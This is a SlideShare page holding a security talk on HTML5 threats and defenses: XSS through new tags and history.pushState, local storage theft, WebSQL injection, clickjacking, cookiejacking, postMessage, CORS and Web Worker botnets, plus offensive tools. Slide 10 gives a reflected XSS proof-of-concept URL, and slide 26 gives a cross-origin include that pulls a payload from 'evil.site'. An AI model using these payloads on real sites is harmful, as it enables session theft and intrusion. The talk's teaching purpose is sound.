Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
youstar@insight-labs
   Introduction to HTML5   HTML5 threat model   Vulnerabilities & Defense   Tools   Reference
   History     HTML1.0——1993.6 Not Standard     HTML 2.0——1995.11 RFC 1866     HTML 3.2——1996.1.14 W3C Recommended Sta...
   Features     The three aspects of HTML5      ▪ Content HTML       ▪ New Tags and Attributes     ▪ Presentation of con...
   Features
   XSS abuse with tags and attributes   Hiding URL Code   Stealing from the storage   Injecting and Exploiting WebSQL...
   In:     New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>     New attributes for tags: autocomplete, autof...
   Attack:     New XSS Vector     Bypass Black-list Filter   Defense:     Add new tags to Black-list     Change Regex
   DOM     window.history.back();     window.history.forward();     window.history.go();   HTML5     history.pushSta...
http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState({},,location.href.split("?").shift());document...
   Type     LocalStorage:for long-term storage     SessionStorage:for the session application(last      when the browse...
   Function     (localStorage | sessionStorage).setItem()     (localStorage | sessionStorage).getItem()     (localStor...
   Attack     Get the data from the storage(cookie,passwd,etc)     Storage your xss shellcode     Unlimit the path   ...
   Database Storage     The same as the Google Gears   Operate     openDatabase("Database Name", "Database Version", "...
   Attack     Store shellcode     SQL inject   Defense     Strick with the sql operate     Encode the sql result bef...
   Store shellcode
   SQL Injection     Use sqlite_master      ▪ SELECT name FROM sqlite_master WHERE type=table      ▪ SELECT sql FROM sql...
   Drag and drop basics     Drag Data     the drag feedback image     drag effects   Drag events:       dragstart   ...
   ClickJacking     XSS + Drag
   CookieJacking     Use many technology to steal user’s local cookies   Technology     How to read the local fileifr...
   Defense     Use iframe with sandbox     If (top !== window) top.location=      window.location.href;     if (top!=s...
   postMessage     Send      ▪ otherWindow.postMessage(message, targetOrigin);     Receive      window.addEventListener...
   Defense     Check the postMessage origin     Don’t use innerHTML      ▪ Element.innerHTML=e.data;//danger      ▪ Ele...
   Cross-Origin Resource Sharing     ▪ Originally Ajax calls were subject to Same Origin Policy     ▪ Site A cannot make ...
   Defense     Don’t set this: Access-Control-Allow-Origin: *      ▪ (Flash crossdomain.xml )     Prevent DDOS      ▪ i...
   Code like this:<html><body><script>x = new XMLHttpRequest();x.open("GET",location.hash.substring(1));x.onreadystatecha...
   Web Workers     running scripts in the background independently     Very simple        var w = new Worker("some_scri...
   Attack     Botnet      ▪ Application‐level DDoS attacks      ▪ Email Spam      ▪ Distributed password cracking     N...
   COR+XSS+Workers=shell of the future
   HTML5CSdump     enumeration and extraction techniques described     before to obtain all the client-side storage rela...
   Imposter       Steal cookies       Set cookies       Steal Local Shared Objects       Steal stored passwords from ...
   Ravan     JavaScript based Distributed Computing system     hashing algorithms      ▪ MD5      ▪ SHA1      ▪ SHA256 ...
 HTML5 带来的新安全威胁:xisigr Attacking with HTML5:lavakumark Abusing HTML5:Ming Chow HTML5 Web Security:Thomas Röthlisberger...
   http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.    html   http://blog.whatwg.org/whats-next-in-html-ep...
   Contact Me   email:youstar@foxmail.com   Site:     www.codesec.info     www.insight-labs.org
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Talk about html5 security
Upcoming SlideShare
Loading in …5
×

Talk about html5 security

3,191 views

Published on

Talk about html5 security

Published in: Education, Technology
  • http://www.codesec.info/talk-about-html5-security.html
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

Talk about html5 security

  1. 1. youstar@insight-labs
  2. 2.  Introduction to HTML5 HTML5 threat model Vulnerabilities & Defense Tools Reference
  3. 3.  History  HTML1.0——1993.6 Not Standard  HTML 2.0——1995.11 RFC 1866  HTML 3.2——1996.1.14 W3C Recommended Standard  HTML 4.0——1997.12.18 W3C Recommended Standard  HTML 4.01——1999.12.24 W3C Recommended Standard  XHTML——2000.1.20 W3C Recommended Standard  HTML5——2008 First Draft Standard  2012 W3C Candidate Recommendation
  4. 4.  Features  The three aspects of HTML5 ▪ Content HTML ▪ New Tags and Attributes ▪ Presentation of content CSS ▪ Interaction with content JavaScript ▪ Add New API Drag LocalStorage WebWorkers etc
  5. 5.  Features
  6. 6.  XSS abuse with tags and attributes Hiding URL Code Stealing from the storage Injecting and Exploiting WebSQL ClickJacking &&CookieJacking Cross Origin Request and postMessage Client‐side File Includes Botnet and widgets
  7. 7.  In:  New tags: <button>,<video>,<audio>,<article>,<footer>,<nav>  New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for input  New media events  New <canvas> tag for 2D rendering  New form controls for date and time  Geolocation  New selectors  Client-side storage including localStorage, sessionStorage, and WebSQL Out:  Presentation elements such a <font>, <center>  Presentation attributes including align, border  <frame>,<frameset>  <applet>  Old special effects: <marquee>,<bgsound>  <noscript>
  8. 8.  Attack:  New XSS Vector  Bypass Black-list Filter Defense:  Add new tags to Black-list  Change Regex
  9. 9.  DOM  window.history.back();  window.history.forward();  window.history.go(); HTML5  history.pushState() ▪ history.pushState(state object,title,URL);  history.replaceState() ▪ The same with pushState,but modifies the current history entry.
  10. 10. http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState({},,location.href.split("?").shift());document.write(1)</script>http://127.0.0.1/html5/poc/history/xsspoc.php
  11. 11.  Type  LocalStorage:for long-term storage  SessionStorage:for the session application(last when the browser closed) Differences  Cookies:4k  LocalStorage/ SessionStorage:depends on browser(usually 5MB) Support  Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
  12. 12.  Function  (localStorage | sessionStorage).setItem()  (localStorage | sessionStorage).getItem()  (localStorage | sessionStorage).deleteItem()  (localStorage | sessionStorage).clear()
  13. 13.  Attack  Get the data from the storage(cookie,passwd,etc)  Storage your xss shellcode  Unlimit the path Defense  Don’t store sensitive data in local storage  Dont use local storage for session identifiers  Stick with cookies and use the HTTPOnly and Secure flags
  14. 14.  Database Storage  The same as the Google Gears Operate  openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");  transaction("YOUR SQL STATEMENT HERE");  executeSql(); Type  SQLite (support by WebKit)
  15. 15.  Attack  Store shellcode  SQL inject Defense  Strick with the sql operate  Encode the sql result before display  Don’t store sensitive data
  16. 16.  Store shellcode
  17. 17.  SQL Injection  Use sqlite_master ▪ SELECT name FROM sqlite_master WHERE type=table ▪ SELECT sql FROM sqlite_master WHERE name=table_name ▪ SELECT sqlite_version()  Select with ? ▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); False ▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True
  18. 18.  Drag and drop basics  Drag Data  the drag feedback image  drag effects Drag events:  dragstart  dragenter  dragover  dragleave  drag  drop  dragend
  19. 19.  ClickJacking  XSS + Drag
  20. 20.  CookieJacking  Use many technology to steal user’s local cookies Technology  How to read the local fileiframe+file://  How to detect the state of cookies Clickjacking  How to send cookiesSMB
  21. 21.  Defense  Use iframe with sandbox  If (top !== window) top.location= window.location.href;  if (top!=self) top.location.href=self.location.href
  22. 22.  postMessage  Send ▪ otherWindow.postMessage(message, targetOrigin);  Receive window.addEventListener("message", receiveMessage, false); function receiveMessage(event) { if (event.origin !== "http://example.org:8080") return; // ... }
  23. 23.  Defense  Check the postMessage origin  Don’t use innerHTML ▪ Element.innerHTML=e.data;//danger ▪ Element.textContent=e.data;//safe  Don’t use Eval to deal with the mesage
  24. 24.  Cross-Origin Resource Sharing ▪ Originally Ajax calls were subject to Same Origin Policy ▪ Site A cannot make XMLHttpRequests to Site B ▪ HTML5 makes it possible to make these cross domain calls ▪ Site ASite B(Response must include a header) ▪ Access-Control-Allow-Origin: Site A Must ▪ Access-Control-Allow-Credentials: true | false ▪ Access-Control-Expose-Headers: ▪ etc
  25. 25.  Defense  Don’t set this: Access-Control-Allow-Origin: * ▪ (Flash crossdomain.xml )  Prevent DDOS ▪ if(origin=="Site A"){header(Access-Control-Allow- Origin:Site A)……//process request}
  26. 26.  Code like this:<html><body><script>x = new XMLHttpRequest();x.open("GET",location.hash.substring(1));x.onreadystatechange=function(){if(x.readyState==4){document.getElementById("main").innerHTML=x.responseText;}}x.send();</script><div id=“main”></div></body></html> POC  Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php  VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>  New type of XSS!!
  27. 27.  Web Workers  running scripts in the background independently  Very simple var w = new Worker("some_script.js"); w.onmessage = function(e) { // do something }; w.terminate()  Access ▪ XHR,navigator object,application cache,spawn other workers!  Can’t access ▪ DOM,window,document objects
  28. 28.  Attack  Botnet ▪ Application‐level DDoS attacks ▪ Email Spam ▪ Distributed password cracking  Network Scanning  Guessing User’s Private IP Address ▪ Identify the user’s subnet ▪ Identify the IP address
  29. 29.  COR+XSS+Workers=shell of the future
  30. 30.  HTML5CSdump  enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name JS-Recon  Port Scans  Network Scans  Detecting private IP address
  31. 31.  Imposter  Steal cookies  Set cookies  Steal Local Shared Objects  Steal stored passwords from FireFox  etc Shell of the Future  Reverse Web Shell handler  Bypass anti-session hijacking measures
  32. 32.  Ravan  JavaScript based Distributed Computing system  hashing algorithms ▪ MD5 ▪ SHA1 ▪ SHA256 ▪ SHA512
  33. 33.  HTML5 带来的新安全威胁:xisigr Attacking with HTML5:lavakumark Abusing HTML5:Ming Chow HTML5 Web Security:Thomas Röthlisberger Abusing HTML 5 Structured Client-side Storage:Alberto Trivero Cookiejacking:Rosario Valotta http://heideri.ch/jso/#html5 http://www.wooyun.org/bugs/wooyun-2011-02351 http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and- dom-l3-top-10-attacks.html http://www.html5test.com
  34. 34.  http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe. html http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox http://code.google.com/intl/zh-CN/apis/gears/api_database.html http://michael-coates.blogspot.com/2010/07/html5-local-storage- and-xss.html http://www.w3.org/TR/access-control/ http://m-austin.com/blog/?p=19 https://developer.mozilla.org/en/ http://www.w3.org/TR/cors/ http://www.andlabs.org/tools/ravan.html http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/
  35. 35.  Contact Me email:youstar@foxmail.com Site:  www.codesec.info  www.insight-labs.org

×